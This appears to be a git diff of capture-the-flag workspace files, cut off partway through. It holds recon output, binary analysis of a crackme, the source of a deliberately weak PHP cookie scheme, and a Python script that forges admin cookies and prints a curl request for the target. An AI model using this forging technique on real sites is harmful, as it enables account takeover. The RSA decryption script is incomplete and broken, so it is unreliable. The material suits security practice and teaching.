NEXT-ID:0
MD5:d41d8cd98f00b204e9800998ecf8427e

2
CTF/Compiled/Compiled.rep/user/~journal.dat Normal file
View File

@@ -0,0 +1,2 @@
IADD:00000000:/udf_7f011960d2115982921274
IDSET:/udf_7f011960d2115982921274:7f011b43f2324964913775

4
CTF/Compiled/Compiled.rep/versioned/~index.bak Normal file
View File

@@ -0,0 +1,4 @@
VERSION=1
/
NEXT-ID:0
MD5:d41d8cd98f00b204e9800998ecf8427e

4
CTF/Compiled/Compiled.rep/versioned/~index.dat Normal file
View File

@@ -0,0 +1,4 @@
VERSION=1
/
NEXT-ID:0
MD5:d41d8cd98f00b204e9800998ecf8427e

34
CTF/Compiled/nm.output Normal file
View File

@@ -0,0 +1,34 @@
000000000000037c r __abi_tag
0000000000004030 B __bss_start
0000000000004038 b completed.0
w __cxa_finalize@GLIBC_2.2.5
0000000000004020 D __data_start
0000000000004020 W data_start
00000000000010b0 t deregister_tm_clones
0000000000001120 t __do_global_dtors_aux
0000000000003dd8 d __do_global_dtors_aux_fini_array_entry
0000000000004028 D __dso_handle
0000000000003de0 d _DYNAMIC
0000000000004030 D _edata
0000000000004040 B _end
0000000000001268 T _fini
0000000000001160 t frame_dummy
0000000000003dd0 d __frame_dummy_init_array_entry
0000000000002120 r __FRAME_END__
U fwrite@GLIBC_2.2.5
0000000000003fe8 d _GLOBAL_OFFSET_TABLE_
w __gmon_start__
0000000000002048 r __GNU_EH_FRAME_HDR
0000000000001000 T _init
0000000000002000 R _IO_stdin_used
U __isoc99_scanf@GLIBC_2.7
w _ITM_deregisterTMCloneTable
w _ITM_registerTMCloneTable
U __libc_start_main@GLIBC_2.34
0000000000001169 T main
U printf@GLIBC_2.2.5
00000000000010e0 t register_tm_clones
0000000000001080 T _start
0000000000004030 B stdout@GLIBC_2.2.5
U strcmp@GLIBC_2.2.5
0000000000004030 D __TMC_END__

280
CTF/Compiled/readelf.output Normal file
View File

@@ -0,0 +1,280 @@
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Position-Independent Executable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x1080
Start of program headers: 64 (bytes into file)
Start of section headers: 14168 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 13
Size of section headers: 64 (bytes)
Number of section headers: 31
Section header string table index: 30
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .interp PROGBITS 0000000000000318 00000318
000000000000001c 0000000000000000 A 0 0 1
[ 2] .note.gnu.pr[...] NOTE 0000000000000338 00000338
0000000000000020 0000000000000000 A 0 0 8
[ 3] .note.gnu.bu[...] NOTE 0000000000000358 00000358
0000000000000024 0000000000000000 A 0 0 4
[ 4] .note.ABI-tag NOTE 000000000000037c 0000037c
0000000000000020 0000000000000000 A 0 0 4
[ 5] .gnu.hash GNU_HASH 00000000000003a0 000003a0
0000000000000028 0000000000000000 A 6 0 8
[ 6] .dynsym DYNSYM 00000000000003c8 000003c8
0000000000000108 0000000000000018 A 7 1 8
[ 7] .dynstr STRTAB 00000000000004d0 000004d0
00000000000000bd 0000000000000000 A 0 0 1
[ 8] .gnu.version VERSYM 000000000000058e 0000058e
0000000000000016 0000000000000002 A 6 0 2
[ 9] .gnu.version_r VERNEED 00000000000005a8 000005a8
0000000000000040 0000000000000000 A 7 1 8
[10] .rela.dyn RELA 00000000000005e8 000005e8
00000000000000d8 0000000000000018 A 6 0 8
[11] .rela.plt RELA 00000000000006c0 000006c0
0000000000000060 0000000000000018 AI 6 24 8
[12] .init PROGBITS 0000000000001000 00001000
0000000000000017 0000000000000000 AX 0 0 4
[13] .plt PROGBITS 0000000000001020 00001020
0000000000000050 0000000000000010 AX 0 0 16
[14] .plt.got PROGBITS 0000000000001070 00001070
0000000000000008 0000000000000008 AX 0 0 8
[15] .text PROGBITS 0000000000001080 00001080
00000000000001e6 0000000000000000 AX 0 0 16
[16] .fini PROGBITS 0000000000001268 00001268
0000000000000009 0000000000000000 AX 0 0 4
[17] .rodata PROGBITS 0000000000002000 00002000
0000000000000045 0000000000000000 A 0 0 4
[18] .eh_frame_hdr PROGBITS 0000000000002048 00002048
000000000000002c 0000000000000000 A 0 0 4
[19] .eh_frame PROGBITS 0000000000002078 00002078
00000000000000ac 0000000000000000 A 0 0 8
[20] .init_array INIT_ARRAY 0000000000003dd0 00002dd0
0000000000000008 0000000000000008 WA 0 0 8
[21] .fini_array FINI_ARRAY 0000000000003dd8 00002dd8
0000000000000008 0000000000000008 WA 0 0 8
[22] .dynamic DYNAMIC 0000000000003de0 00002de0
00000000000001e0 0000000000000010 WA 7 0 8
[23] .got PROGBITS 0000000000003fc0 00002fc0
0000000000000028 0000000000000008 WA 0 0 8
[24] .got.plt PROGBITS 0000000000003fe8 00002fe8
0000000000000038 0000000000000008 WA 0 0 8
[25] .data PROGBITS 0000000000004020 00003020
0000000000000010 0000000000000000 WA 0 0 8
[26] .bss NOBITS 0000000000004030 00003030
0000000000000010 0000000000000000 WA 0 0 8
[27] .comment PROGBITS 0000000000000000 00003030
000000000000001e 0000000000000001 MS 0 0 1
[28] .symtab SYMTAB 0000000000000000 00003050
00000000000003c0 0000000000000018 29 18 8
[29] .strtab STRTAB 0000000000000000 00003410
000000000000022d 0000000000000000 0 0 1
[30] .shstrtab STRTAB 0000000000000000 0000363d
000000000000011a 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
D (mbind), l (large), p (processor specific)
There are no section groups in this file.
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000002d8 0x00000000000002d8 R 0x8
INTERP 0x0000000000000318 0x0000000000000318 0x0000000000000318
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000720 0x0000000000000720 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x0000000000000271 0x0000000000000271 R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x0000000000000124 0x0000000000000124 R 0x1000
LOAD 0x0000000000002dd0 0x0000000000003dd0 0x0000000000003dd0
0x0000000000000260 0x0000000000000270 RW 0x1000
DYNAMIC 0x0000000000002de0 0x0000000000003de0 0x0000000000003de0
0x00000000000001e0 0x00000000000001e0 RW 0x8
NOTE 0x0000000000000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
NOTE 0x0000000000000358 0x0000000000000358 0x0000000000000358
0x0000000000000044 0x0000000000000044 R 0x4
GNU_PROPERTY 0x0000000000000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
GNU_EH_FRAME 0x0000000000002048 0x0000000000002048 0x0000000000002048
0x000000000000002c 0x000000000000002c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x0000000000002dd0 0x0000000000003dd0 0x0000000000003dd0
0x0000000000000230 0x0000000000000230 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt
03 .init .plt .plt.got .text .fini
04 .rodata .eh_frame_hdr .eh_frame
05 .init_array .fini_array .dynamic .got .got.plt .data .bss
06 .dynamic
07 .note.gnu.property
08 .note.gnu.build-id .note.ABI-tag
09 .note.gnu.property
10 .eh_frame_hdr
11
12 .init_array .fini_array .dynamic .got
Dynamic section at offset 0x2de0 contains 26 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
0x000000000000000c (INIT) 0x1000
0x000000000000000d (FINI) 0x1268
0x0000000000000019 (INIT_ARRAY) 0x3dd0
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000000000001a (FINI_ARRAY) 0x3dd8
0x000000000000001c (FINI_ARRAYSZ) 8 (bytes)
0x000000006ffffef5 (GNU_HASH) 0x3a0
0x0000000000000005 (STRTAB) 0x4d0
0x0000000000000006 (SYMTAB) 0x3c8
0x000000000000000a (STRSZ) 189 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000015 (DEBUG) 0x0
0x0000000000000003 (PLTGOT) 0x3fe8
0x0000000000000002 (PLTRELSZ) 96 (bytes)
0x0000000000000014 (PLTREL) RELA
0x0000000000000017 (JMPREL) 0x6c0
0x0000000000000007 (RELA) 0x5e8
0x0000000000000008 (RELASZ) 216 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000006ffffffb (FLAGS_1) Flags: PIE
0x000000006ffffffe (VERNEED) 0x5a8
0x000000006fffffff (VERNEEDNUM) 1
0x000000006ffffff0 (VERSYM) 0x58e
0x000000006ffffff9 (RELACOUNT) 3
0x0000000000000000 (NULL) 0x0
Relocation section '.rela.dyn' at offset 0x5e8 contains 9 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000003dd0 000000000008 R_X86_64_RELATIVE 1160
000000003dd8 000000000008 R_X86_64_RELATIVE 1120
000000004028 000000000008 R_X86_64_RELATIVE 4028
000000003fc0 000100000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
000000003fc8 000200000006 R_X86_64_GLOB_DAT 0000000000000000 _ITM_deregisterTM[...] + 0
000000003fd0 000500000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000003fd8 000800000006 R_X86_64_GLOB_DAT 0000000000000000 _ITM_registerTMCl[...] + 0
000000003fe0 000a00000006 R_X86_64_GLOB_DAT 0000000000000000 __cxa_finalize@GLIBC_2.2.5 + 0
000000004030 000900000005 R_X86_64_COPY 0000000000004030 stdout@GLIBC_2.2.5 + 0
Relocation section '.rela.plt' at offset 0x6c0 contains 4 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000004000 000300000007 R_X86_64_JUMP_SLO 0000000000000000 printf@GLIBC_2.2.5 + 0
000000004008 000400000007 R_X86_64_JUMP_SLO 0000000000000000 strcmp@GLIBC_2.2.5 + 0
000000004010 000600000007 R_X86_64_JUMP_SLO 0000000000000000 __isoc99_scanf@GLIBC_2.7 + 0
000000004018 000700000007 R_X86_64_JUMP_SLO 0000000000000000 fwrite@GLIBC_2.2.5 + 0
No processor specific unwind information to decode
Symbol table '.dynsym' contains 11 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (2)
2: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND [...]@GLIBC_2.2.5 (3)
4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND [...]@GLIBC_2.2.5 (3)
5: 0000000000000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __[...]@GLIBC_2.7 (4)
7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND [...]@GLIBC_2.2.5 (3)
8: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_registerTMC[...]
9: 0000000000004030 8 OBJECT GLOBAL DEFAULT 26 [...]@GLIBC_2.2.5 (3)
10: 0000000000000000 0 FUNC WEAK DEFAULT UND [...]@GLIBC_2.2.5 (3)
Symbol table '.symtab' contains 40 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000000 0 FILE LOCAL DEFAULT ABS Scrt1.o
2: 000000000000037c 32 OBJECT LOCAL DEFAULT 4 __abi_tag
3: 0000000000000000 0 FILE LOCAL DEFAULT ABS crtstuff.c
4: 00000000000010b0 0 FUNC LOCAL DEFAULT 15 deregister_tm_clones
5: 00000000000010e0 0 FUNC LOCAL DEFAULT 15 register_tm_clones
6: 0000000000001120 0 FUNC LOCAL DEFAULT 15 __do_global_dtors_aux
7: 0000000000004038 1 OBJECT LOCAL DEFAULT 26 completed.0
8: 0000000000003dd8 0 OBJECT LOCAL DEFAULT 21 __do_global_dtor[...]
9: 0000000000001160 0 FUNC LOCAL DEFAULT 15 frame_dummy
10: 0000000000003dd0 0 OBJECT LOCAL DEFAULT 20 __frame_dummy_in[...]
11: 0000000000000000 0 FILE LOCAL DEFAULT ABS zzz.c
12: 0000000000000000 0 FILE LOCAL DEFAULT ABS crtstuff.c
13: 0000000000002120 0 OBJECT LOCAL DEFAULT 19 __FRAME_END__
14: 0000000000000000 0 FILE LOCAL DEFAULT ABS
15: 0000000000003de0 0 OBJECT LOCAL DEFAULT 22 _DYNAMIC
16: 0000000000002048 0 NOTYPE LOCAL DEFAULT 18 __GNU_EH_FRAME_HDR
17: 0000000000003fe8 0 OBJECT LOCAL DEFAULT 24 _GLOBAL_OFFSET_TABLE_
18: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __libc_start_mai[...]
19: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
20: 0000000000004030 8 OBJECT GLOBAL DEFAULT 26 stdout@GLIBC_2.2.5
21: 0000000000004020 0 NOTYPE WEAK DEFAULT 25 data_start
22: 0000000000004030 0 NOTYPE GLOBAL DEFAULT 25 _edata
23: 0000000000001268 0 FUNC GLOBAL HIDDEN 16 _fini
24: 0000000000000000 0 FUNC GLOBAL DEFAULT UND printf@GLIBC_2.2.5
25: 0000000000004020 0 NOTYPE GLOBAL DEFAULT 25 __data_start
26: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strcmp@GLIBC_2.2.5
27: 0000000000000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__
28: 0000000000004028 0 OBJECT GLOBAL HIDDEN 25 __dso_handle
29: 0000000000002000 4 OBJECT GLOBAL DEFAULT 17 _IO_stdin_used
30: 0000000000004040 0 NOTYPE GLOBAL DEFAULT 26 _end
31: 0000000000001080 34 FUNC GLOBAL DEFAULT 15 _start
32: 0000000000004030 0 NOTYPE GLOBAL DEFAULT 26 __bss_start
33: 0000000000001169 253 FUNC GLOBAL DEFAULT 15 main
34: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __isoc99_scanf@G[...]
35: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fwrite@GLIBC_2.2.5
36: 0000000000004030 0 OBJECT GLOBAL HIDDEN 25 __TMC_END__
37: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_registerTMC[...]
38: 0000000000000000 0 FUNC WEAK DEFAULT UND __cxa_finalize@G[...]
39: 0000000000001000 0 FUNC GLOBAL HIDDEN 12 _init
Histogram for `.gnu.hash' bucket list length (total of 2 buckets):
Length Number % of total Coverage
0 1 ( 50.0%)
1 0 ( 0.0%) 0.0%
2 1 ( 50.0%) 100.0%
Version symbols section '.gnu.version' contains 11 entries:
Addr: 0x000000000000058e Offset: 0x0000058e Link: 6 (.dynsym)
000: 0 (*local*) 2 (GLIBC_2.34) 1 (*global*) 3 (GLIBC_2.2.5)
004: 3 (GLIBC_2.2.5) 1 (*global*) 4 (GLIBC_2.7) 3 (GLIBC_2.2.5)
008: 1 (*global*) 3 (GLIBC_2.2.5) 3 (GLIBC_2.2.5)
Version needs section '.gnu.version_r' contains 1 entry:
Addr: 0x00000000000005a8 Offset: 0x000005a8 Link: 7 (.dynstr)
000000: Version: 1 File: libc.so.6 Cnt: 3
0x0010: Name: GLIBC_2.7 Flags: none Version: 4
0x0020: Name: GLIBC_2.2.5 Flags: none Version: 3
0x0030: Name: GLIBC_2.34 Flags: none Version: 2
Displaying notes found in: .note.gnu.property
Owner Data size Description
GNU 0x00000010 NT_GNU_PROPERTY_TYPE_0
Properties: x86 ISA needed: x86-64-baseline
Displaying notes found in: .note.gnu.build-id
Owner Data size Description
GNU 0x00000014 NT_GNU_BUILD_ID (unique build ID bitstring)
Build ID: 06dcfaf13fb76a4b556852c5fbf9725ac21054fd
Displaying notes found in: .note.ABI-tag
Owner Data size Description
GNU 0x00000010 NT_GNU_ABI_TAG (ABI version tag)
OS: Linux, ABI: 3.2.0

90
CTF/Compiled/strings.output Normal file
View File

@@ -0,0 +1,90 @@
/lib64/ld-linux-x86-64.so.2
jKUhR
__cxa_finalize
__libc_start_main
strcmp
stdout
__isoc99_scanf
fwrite
printf
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
StringsIH
sForNoobH
Password:
DoYouEven%sCTF
__dso_handle
_init
Correct!
Try again!
;*3$"
GCC: (Debian 11.3.0-5) 11.3.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
zzz.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
stdout@GLIBC_2.2.5
_edata
_fini
printf@GLIBC_2.2.5
__data_start
strcmp@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
__isoc99_scanf@GLIBC_2.7
fwrite@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

0
CTF/Corridor/gobuster_scan1.txt Normal file
View File

1
CTF/Corridor/hash_test.txt Normal file
View File

@@ -0,0 +1 @@
eccbc87e4b5ce2fe28308fd9f2a7baf3

21
CTF/Corridor/nmap_scan1.txt Normal file
View File

@@ -0,0 +1,21 @@
# Nmap 7.95 scan initiated Fri Oct 17 14:43:38 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan1.txt 10.10.113.20
Nmap scan report for 10.10.113.20
Host is up (0.085s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor
|_http-server-header: Werkzeug/2.0.3 Python/3.10.2
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 155.99 ms 10.14.0.1
2 155.95 ms 10.10.113.20
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 17 14:43:51 2025 -- 1 IP address (1 host up) scanned in 12.98 seconds

96
CTF/CryptoFailureV1.1/cookie.php Normal file
View File

@@ -0,0 +1,96 @@
<?php
include('config.php');
function generate_cookie($user,$ENC_SECRET_KEY) {
$SALT=generatesalt(2);
$secure_cookie_string = $user.":".$_SERVER['HTTP_USER_AGENT'].":".$ENC_SECRET_KEY;
$secure_cookie = make_secure_cookie($secure_cookie_string,$SALT);
setcookie("secure_cookie",$secure_cookie,time()+3600,'/','',false);
setcookie("user","$user",time()+3600,'/','',false);
}
function cryptstring($what,$SALT){
return crypt($what,$SALT);
}
function make_secure_cookie($text,$SALT) {
$secure_cookie='';
foreach ( str_split($text,8) as $el ) {
$secure_cookie .= cryptstring($el,$SALT);
}
return($secure_cookie);
}
function generatesalt($n) {
$randomString='';
$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
for ($i = 0; $i < $n; $i++) {
$index = rand(0, strlen($characters) - 1);
$randomString .= $characters[$index];
}
return $randomString;
}
function verify_cookie($ENC_SECRET_KEY){
$crypted_cookie=$_COOKIE['secure_cookie'];
$user=$_COOKIE['user'];
$string=$user.":".$_SERVER['HTTP_USER_AGENT'].":".$ENC_SECRET_KEY;
$salt=substr($_COOKIE['secure_cookie'],0,2);
if(make_secure_cookie($string,$salt)===$crypted_cookie) {
return true;
} else {
return false;
}
}
if ( isset($_COOKIE['secure_cookie']) && isset($_COOKIE['user'])) {
$user=$_COOKIE['user'];
if (verify_cookie($ENC_SECRET_KEY)) {
if ($user === "admin") {
echo 'congrats: ******flag here******. Now I want the key.';
} else {
$length=strlen($_SERVER['HTTP_USER_AGENT']);
print "<p>You are logged in as " . $user . ":" . str_repeat("*", $length) . "\n";
print "<p>SSO cookie is protected with traditional military grade en<b>crypt</b>ion\n";
}
} else {
print "<p>You are not logged in\n";
}
}
else {
generate_cookie('guest',$ENC_SECRET_KEY);
header('Location: /');
}
?>

1
CTF/CryptoFailureV1.1/cookie.txt Normal file
View File

@@ -0,0 +1 @@
ZMo2taPOmMhdMZM2z2AphWcILoZMxFinCLiRVmEZMWLmCZ2GHerYZM1rS15r7gIwAZMqbuJOmUXbHEZMQJNUkDXzcjgZM81jTHEw6x7AZM5QmbHcA6swYZMfaTKbn9OSVUZMcy9ybzEcYooZMS9XvXW2YLQgZM0x9ygBRXkd.ZMjgjfPOZb5ZYZMw.PexD1NMpUZMOAoe8smu6HQZMWVrh9ayWl76ZMfh8Y.UuqFnQZMZ0z2OMEoJH2ZMA3%2FHC9OFvXcZMQiJ3o8MZfP.ZMw8DRJbQhT5cZMk1melCAEgg6ZMCkfK2wdjjywZMw9YyP4ZUgmIZMdz5BwNSEbiIZMMdf1cyEoC.6ZMt5kzmvdKFcwZMlzwOBHtPfJI

1
CTF/CryptoFailureV1.1/file_fuzz1.txt Normal file
View File

File diff suppressed because one or more lines are too long

26
CTF/CryptoFailureV1.1/nmap_scan1.txt Normal file
View File

@@ -0,0 +1,26 @@
# Nmap 7.95 scan initiated Fri Oct 17 16:03:12 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan1.txt 10.10.199.200
Nmap scan report for 10.10.199.200
Host is up (0.099s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 57:2c:43:78:0c:d3:13:5b:8d:83:df:63:cf:53:61:91 (ECDSA)
|_ 256 45:e1:3c:eb:a6:2d:d7:c6:bb:43:24:7e:02:e9:11:39 (ED25519)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-title: Did not follow redirect to /
|_http-server-header: Apache/2.4.59 (Debian)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 69.27 ms 10.14.0.1
2 68.41 ms 10.10.199.200
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 17 16:03:26 2025 -- 1 IP address (1 host up) scanned in 13.81 seconds

69
CTF/CryptoFailureV1.1/python_create_cookie.py Normal file
View File

@@ -0,0 +1,69 @@
#!/usr/bin/env python3
# generate_admin_cookie_passlib.py
# Produces ready-to-use Set-Cookie headers for user=admin replicating PHP crypt() with 2-char salt.
#
# Requires: pip install passlib
#
import sys
import time
import random
import email.utils
from passlib.hash import des_crypt # pip install passlib
def generatesalt(n=2):
characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
return ''.join(random.choice(characters) for _ in range(n))
def make_secure_cookie(text, salt):
"""
Replicates the PHP code:
foreach (str_split($text, 8) as $el) { $secure_cookie .= crypt($el, $SALT); }
using DES-based crypt (2-char salt). Each chunk becomes a 13-char crypt output;
these are concatenated to form the secure_cookie.
"""
chunks = [text[i:i+8] for i in range(0, len(text), 8)]
out = "".join(des_crypt.hash(chunk, salt=salt) for chunk in chunks)
return out
def http_expires_secs(seconds_from_now=3600):
return email.utils.formatdate(time.time() + seconds_from_now, usegmt=True)
def generate_admin_cookie(enc_secret_key, user_agent=None, salt=None, lifetime=3600):
if user_agent is None:
user_agent = "Mozilla/5.0 (X11; Linux x86_64)"
if salt is None:
salt = generatesalt(2)
secure_cookie_string = f"admin:{user_agent}:{enc_secret_key}"
secure_cookie = make_secure_cookie(secure_cookie_string, salt)
expires = http_expires_secs(lifetime)
return {
"user": "admin",
"secure_cookie": secure_cookie,
"salt": salt,
"expires": expires,
"path": "/"
}
def main():
args = sys.argv[1:]
if len(args) >= 1:
ENC_SECRET_KEY = args[0]
else:
print("Usage: python generate_admin_cookie_passlib.py <ENC_SECRET_KEY> [User-Agent] [salt]")
sys.exit(1)
ua = args[1] if len(args) >= 2 else "Mozilla/5.0 (X11; Linux x86_64)"
salt_arg = args[2] if len(args) >= 3 else None
cookie = generate_admin_cookie(ENC_SECRET_KEY, user_agent=ua, salt=salt_arg)
print("# Ready-to-use Set-Cookie headers (paste into Burp / DevTools -> Request Headers)")
print(f"Set-Cookie: user={cookie['user']}; Expires={cookie['expires']}; Path={cookie['path']}")
print(f"Set-Cookie: secure_cookie={cookie['secure_cookie']}; Expires={cookie['expires']}; Path={cookie['path']}")
print("\n# Example: curl with cookies (server sees your request's User-Agent):")
print(f"curl -A \"{ua}\" -b \"user={cookie['user']}; secure_cookie={cookie['secure_cookie']}\" http://TARGET/")
print("\n# If you want to use a specific salt (e.g. to match an existing cookie's salt), pass it as the 3rd arg.")
print("# Note: replace TARGET with the challenge domain/host when using curl.")
if __name__ == "__main__":
main()

14
CTF/CryptoSystem/decrypt.py Normal file
View File

@@ -0,0 +1,14 @@
import sympy
n = 15956250162063169819282947443743274370048643274416742655348817823973383829364700573954709256391245826513107784713930378963551647706777479778285473302665664446406061485616884195924631582130633137574953293367927991283669562895956699807156958071540818023122362163066253240925121801013767660074748021238790391454429710804497432783852601549399523002968004989537717283440868312648042676103745061431799927120153523260328285953425136675794192604406865878795209326998767174918642599709728617452705492122243853548109914399185369813289827342294084203933615645390728890698153490318636544474714700796569746488209438597446475170891
e = 0x10001
p, q = sympy.factorint(n)
phi = (p-1)*(q-1)
d = inverse(e, phi)
c = 3591116664311986976882299385598135447435246460706500887241769555088416359682787844532414943573794993699976035504884662834956846849863199643104254423886040489307177240200877443325036469020737734735252009890203860703565467027494906178455257487560902599823364571072627673274663460167258994444999732164163413069705603918912918029341906731249618390560631294516460072060282096338188363218018310558256333502075481132593474784272529318141983016684762611853350058135420177436511646593703541994904632405891675848987355444490338162636360806437862679321612136147437578799696630631933277767263530526354532898655937702383789647510
test =

15
CTF/CryptoSystem/file.py Normal file
View File

@@ -0,0 +1,15 @@
from Crypto.Util.number import *
from flag import FLAG
def primo(n):
n += 2 if n & 1 else 1
while not isPrime(n):
n += 2
return n
p = getPrime(1024)
q = primo(p)
n = p * q
e = 0x10001
d = inverse(e, (p-1) * (q-1))
c = pow(bytes_to_long(FLAG.encode()), e, n)

51
CTF/Decryptify1.2/api.js Normal file
View File

@@ -0,0 +1,51 @@
function b(c,d){
const e=a();
return b=function(f,g){
f=f-0x165;
let h=e[f];
return h;
},b(c,d);
}
const j=b;
function a(){
const k=[
'16OTYqOr',
'861cPVRNJ',
'474AnPRwy',
'H7gY2tJ9wQzD4rS1',
'5228dijopu',
'29131EDUYqd',
'8756315tjjUKB',
'1232020YOKSiQ',
'7042671GTNtXE',
'1593688UqvBWv',
'90209ggCpyY'
];
a=function(){
return k;
};
return a();
} (function(d,e) {
const i=b,f=d();
while(!![]){
try{
const g=
parseInt(i(0x16b))/0x1+
-parseInt(i(0x16f))/0x2+
parseInt(i(0x167))/0x3*(
parseInt(i(0x16a))/0x4)+
parseInt(i(0x16c))/0x5+
parseInt(i(0x168))/0x6*(
parseInt(i(0x165))/0x7)+
-parseInt(i(0x166))/0x8*(parseInt(i(0x16e))/0x9)+
parseInt(i(0x16d))/0xa;
if(g===e)break;
else f['push'](
f['shift']());
}catch(h){
f['push'](f['shift']());
}
}
}
(a,0xe43f0));
const c=j(0x169);

9
CTF/Decryptify1.2/app.log Normal file
View File

@@ -0,0 +1,9 @@
2025-01-23 14:32:56 - User POST to /index.php (Login attempt)
2025-01-23 14:33:01 - User POST to /index.php (Login attempt)
2025-01-23 14:33:05 - User GET /index.php (Login page access)
2025-01-23 14:33:15 - User POST to /index.php (Login attempt)
2025-01-23 14:34:20 - User POST to /index.php (Invite created, code: MTM0ODMzNzEyMg== for alpha@fake.thm)
2025-01-23 14:35:25 - User GET /index.php (Login page access)
2025-01-23 14:36:30 - User POST to /dashboard.php (User alpha@fake.thm deactivated)
2025-01-23 14:37:35 - User GET /login.php (Page not found)
2025-01-23 14:38:40 - User POST to /dashboard.php (New user created: hello@fake.thm)

44
CTF/Decryptify1.2/dashboard.php Normal file
View File

@@ -0,0 +1,44 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
